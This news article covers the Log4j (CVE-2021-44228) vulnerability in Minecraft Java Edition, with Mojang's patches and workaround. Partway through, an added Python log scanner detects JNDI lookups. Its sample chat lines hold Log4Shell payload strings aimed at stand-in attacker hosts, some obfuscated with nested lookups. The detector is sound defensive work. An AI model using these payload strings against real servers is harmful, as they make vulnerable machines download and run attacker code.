Original story (see the update below)
A critical security issue has been discovered that affects multiplayer servers in versions of Minecraft Java Edition as far back as 1.7.
Developer Mojang has not officially provided any specifics about the exploit, but advises users not to play any versions before 1.17 or any modded versions for the time being.
Mojang says that restarting the game's launcher should download a fix for the vulnerability for versions 1.12 through 1.18; versions prior to 1.12 may still be vulnerable.
The vulnerability (tracked as CVE-2021-44228) lies in Log4j, a widely used Java logging library, in versions before 2.15.0. Minecraft uses this library for its servers and clients, but it is also used by a great deal of other software.
The vulnerability works as follows: when Log4j formats a log message that contains the lookup string ${jndi:ldap://<url>}, it connects to the named server through JNDI and can load and run Java code that the server returns. Whoever controls the text that gets logged therefore controls the URL, and with it the code that is fetched.
An attacker can trigger this simply by sending a chat message containing such a string, since chat messages are logged by the server and by every client that receives them.
Any server or client running a vulnerable version of Log4j (which includes many unpatched Minecraft versions) can thus be made to download and run attacker-supplied code, which may give the attacker control of the affected machine.
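To make the mechanism concrete from the defender's side, here is an added example (not part of the original article, and not Mojang or Log4j code) that scans server chat log lines for the lookup string described above. The log lines, player names and hostnames are constructed for the example; it deliberately goes beyond the plain ${jndi:ldap://...} form, because real attempts hid the word "jndi" behind nested Log4j lookups such as ${lower:j} or ${::-j}, which naive string matching misses. The substitution rules modelled here are an approximation of Log4j's own lookup resolution, limited to the forms used for obfuscation.

```python
import re
from typing import List, Optional, Tuple

# An innermost ${...} lookup: a body with no further '$', '{' or '}' inside it.
INNER_LOOKUP_RE = re.compile(r"\$\{([^${}]*)\}")

# The payload once obfuscation is undone. Log4j lower-cases the lookup prefix,
# so "JnDi" works as well as "jndi" for an attacker; match case-insensitively.
JNDI_RE = re.compile(
    r"\$\{jndi:(?P<scheme>[a-z]+):/*(?P<host>[^/}\s]+)", re.IGNORECASE
)


def resolve_lookup(body: str) -> Optional[str]:
    """Approximate what Log4j substitutes for ONE innermost lookup.

    Only the forms attackers used to hide "jndi" are modelled (assumption of
    this example, not a full Log4j implementation):
      ${x:-default} and ${::-default}  -> "default"   (default-value syntax)
      ${lower:X} / ${upper:X}          -> case-folded X
    Anything else returns None and is left in the text untouched.
    """
    if ":-" in body:
        return body.split(":-", 1)[1]
    prefix, sep, key = body.partition(":")
    if not sep:
        return None
    prefix = prefix.strip().lower()
    if prefix == "lower":
        return key.lower()
    if prefix == "upper":
        return key.upper()
    return None


def normalize(message: str, max_rounds: int = 64) -> str:
    """Collapse nested non-JNDI lookups until a hidden ${jndi:...} surfaces."""
    for _ in range(max_rounds):
        for m in INNER_LOOKUP_RE.finditer(message):
            body = m.group(1)
            if body.lstrip().lower().startswith("jndi:"):
                continue  # this is the payload itself; keep it intact
            replacement = resolve_lookup(body)
            if replacement is None:
                continue  # lookup not modelled; leave it as written
            message = message[: m.start()] + replacement + message[m.end() :]
            break  # text changed, rescan from the start
        else:
            return message  # nothing left to resolve
    return message


def find_jndi_payloads(lines: List[str]) -> List[Tuple[int, str, str]]:
    """Return (line_number, scheme, host) for every line carrying a JNDI lookup."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = JNDI_RE.search(normalize(line))
        if m:
            hits.append((n, m.group("scheme").lower(), m.group("host")))
    return hits


# Constructed sample lines in the Minecraft server chat log format. Player
# names and attacker hosts are invented for this example.
SAMPLE_LOG = [
    "[20:15:01] [Server thread/INFO]: <Steve> anyone want to trade diamonds?",
    "[20:15:07] [Server thread/INFO]: <griefer1> ${jndi:ldap://198.51.100.23:1389/a}",
    "[20:15:09] [Server thread/INFO]: <griefer1> ${${lower:j}ndi:ldap://attacker.example/x}",
    "[20:15:11] [Server thread/INFO]: <griefer1> ${${::-j}${::-n}${::-d}${::-i}:rmi://attacker.example:1099/y}",
    "[20:15:13] [Server thread/INFO]: <griefer1> ${${env:NaN:-j}ndi${env:NaN:-:}dns://attacker.example/z}",
    "[20:15:20] [Server thread/INFO]: <Alex> that ${jndi stuff didn't do anything lol",
    "[20:15:22] [Server thread/INFO]: <Alex> my shop costs ${price:-5} emeralds",
]

if __name__ == "__main__":
    for line_no, scheme, host in find_jndi_payloads(SAMPLE_LOG):
        print(f"line {line_no}: JNDI lookup via {scheme} to {host}")
```

Lines 2 to 5 of the sample are reported with the scheme and host to block, while the two benign lines (an unclosed "${jndi" fragment and an ordinary default-value lookup) are not. Treat a detector like this as a compensating control for spotting attempts in logs, not as a substitute for patching: the real fix is a Log4j version without the lookup, or the library-level mitigation Mojang describes.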
Mojang today released a release candidate for version 1.18.1, which they state fixes this security issue.
As a temporary workaround before the release of 1.18.1, Mojang advises disabling Log4j's message lookups with a JVM argument when starting the game (the system property -Dlog4j2.formatMsgNoLookups=true). This only switches off the lookup feature rather than updating the library, and the property is only honoured by Log4j 2.10 and later, which is why Mojang's guidance differs for older game versions.
Mojang has published an article about the exploit, confirming the Log4j library as the cause and giving advice for users across different versions and mods.
Mojang has now released a patch for all earlier affected versions of Minecraft. The game's launcher must be restarted to get this patch.
Minecraft Realms has also been patched and is now safe to play on.
The all-clear has now been given for Minecraft players to play on unmodded multiplayer servers.
Mojang warns that modded clients may still be at risk from this exploit, but notes that the popular third-party mod loaders Forge and Fabric and the Paper server software have been updated to patch the vulnerability.
Mojang will give updates on their social media channels if any further information becomes available.